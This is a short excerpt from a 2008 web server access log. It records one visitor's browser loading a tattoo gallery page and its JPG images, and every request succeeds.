219.101.201.34 - - [22/Jun/2008:01:39:39 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:39 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:39 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:40 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:40 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
